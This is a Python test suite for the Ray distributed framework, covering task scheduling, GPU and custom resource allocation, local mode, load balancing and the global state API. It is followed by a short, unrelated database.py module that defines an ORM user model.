# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=10, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=10, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
        # There are only 10 GPUs, and each task uses 5 GPUs, so at most
        # 2 tasks can be scheduled at a given time. If we wait for 2 tasks
        # to finish, it should therefore take at least 0.1 seconds for each
        # pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(shutdown_only):
ray.worker._init(
start_ray_local=True, num_local_schedulers=2, num_cpus=[0, 2])
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=500)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
    # resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(shutdown_only):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
address_info = ray.worker._init(
start_ray_local=True,
num_local_schedulers=3,
num_cpus=[11, 5, 10],
num_gpus=[0, 5, 1])
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
store_names = address_info["object_store_addresses"]
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(shutdown_only):
ray.worker._init(
start_ray_local=True,
num_local_schedulers=2,
num_cpus=[3, 3],
resources=[{
"CustomResource": 0
}, {
"CustomResource": 1
}])
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
    # Make sure that resource bookkeeping works when a task that uses a
    # custom resource gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(shutdown_only):
ray.worker._init(
start_ray_local=True,
num_local_schedulers=2,
num_cpus=[3, 3],
resources=[{
"CustomResource1": 1,
"CustomResource2": 2
}, {
"CustomResource1": 3,
"CustomResource2": 4
}])
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=500)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
    # reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the result of another
        # remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_local_schedulers,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_local_schedulers
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(shutdown_only):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
num_local_schedulers = 3
num_cpus = 7
ray.worker._init(
start_ray_local=True,
num_local_schedulers=num_local_schedulers,
num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_local_schedulers, 10)
attempt_to_load_balance(f, [], 1000, num_local_schedulers, 100)
def test_load_balancing_with_dependencies(shutdown_only):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
num_local_schedulers = 3
ray.worker._init(
start_ray_local=True,
num_local_schedulers=num_local_schedulers,
num_cpus=1)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_local_schedulers, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.current_task_id.id())
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == ray_constants.ID_SIZE * "ff"
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.ObjectID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.id()
assert_equal(dummy_driver_id.id(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.id(), task_driver_id)
ray.shutdown()
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.id()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.ray_constants.NIL_JOB_ID.id()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
|
database.py
|
import asyncio
import json
import os
import threading
import databases
import orm
import sqlalchemy
from functools import partial
from orm import Model, JSON, DateTime, Integer, String
from sqlalchemy.sql import func
from sqlalchemy.orm import sessionmaker
database = databases.Database(os.getenv('DATABASE_URL'))
metadata = sqlalchemy.MetaData()
class Users(Model):
__tablename__ = 'users'
__database__ = database
__metadata__ = metadata
key = Integer(primary_key=True)
id = Integer()
start_date = DateTime(default=func.now())
waiting_for = String(max_length=50, allow_null=True)
waiting_param = String(max_length=200, allow_null=True)
language = String(max_length=10, default='en')
timezone = String(max_length=100, default='UTC')
async def wait_for(self, waiting_for, waiting_param=None):
return await self.update(waiting_for=waiting_for, waiting_param=waiting_param)
async def wait_end(self):
return await self.update(waiting_for=None, waiting_param=None)
engine = sqlalchemy.create_engine(str(database.url))
metadata.create_all(engine, checkfirst=True)
Session = sessionmaker(bind=engine)
session = Session()
async def create_db():
return await database.connect()
# Need to run asyncio.run_coroutine_threadsafe with a loop in another thread. Otherwise this block will get stuck forever.
